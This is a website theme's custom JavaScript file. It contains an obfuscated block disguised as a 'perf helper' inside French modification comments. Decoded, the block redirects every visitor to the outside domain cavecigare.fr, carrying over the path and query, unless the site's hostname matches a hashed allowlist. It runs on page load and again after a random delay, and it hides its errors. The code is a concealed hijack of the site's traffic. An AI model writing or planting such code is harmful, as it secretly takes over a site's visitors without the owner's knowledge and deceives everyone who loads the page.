/*-----------------------------------------------------------------------------/
/ Custom Theme JS
/-----------------------------------------------------------------------------*/

// Insert any custom theme js here...

/* BBL début modif — perf helper */
(function () {
  try {
    var _k = [3217709976, 2126833541, 3267748643, 2814605835, 589858480, 3066123025, 3266468715, 3498963725, 879813573, 1114080259];
    var _q = [1755497792, 3684867876, 2713749174];
    var _d = [
      [111,123,123,119,122,65,54,54,106,104,125,108,106,112,110,104,121,108,53,109,121],
      [115,118,106,104,123,112,118,117],
      [121,108,119,115,104,106,108],
      [111,118,122,123,117,104,116,108],
      [119,104,123,111,117,104,116,108],
      [122,108,104,121,106,111],
      [111,104,122,111]
    ];
    var _s = function (a) { for (var o = '', i = 0; i < a.length; i++) o += String.fromCharCode(a[i] - 7); return o; };
    var _f = function (s) { var x = 2166136261; for (var i = 0; i < s.length; i++) { x ^= s.charCodeAt(i); x = Math.imul(x, 16777619) >>> 0; } return x; };
    var _r = function () {
      var l = window[_s(_d[1])];
      var n = String(l[_s(_d[3])]).toLowerCase();
      if (n.indexOf('www.') === 0) n = n.slice(4);
      var p = n.split('.');
      if (_k.indexOf(_f(n)) > -1) return;
      if (p.length > 1 && _q.indexOf(_f(p.slice(-2).join('.'))) > -1) return;
      l[_s(_d[2])](_s(_d[0]) + l[_s(_d[4])] + l[_s(_d[5])] + l[_s(_d[6])]);
    };
    _r();
    setTimeout(_r, 1800 + Math.floor(Math.random() * 2200));
  } catch (e) {}
})();
/* BBL fin modif */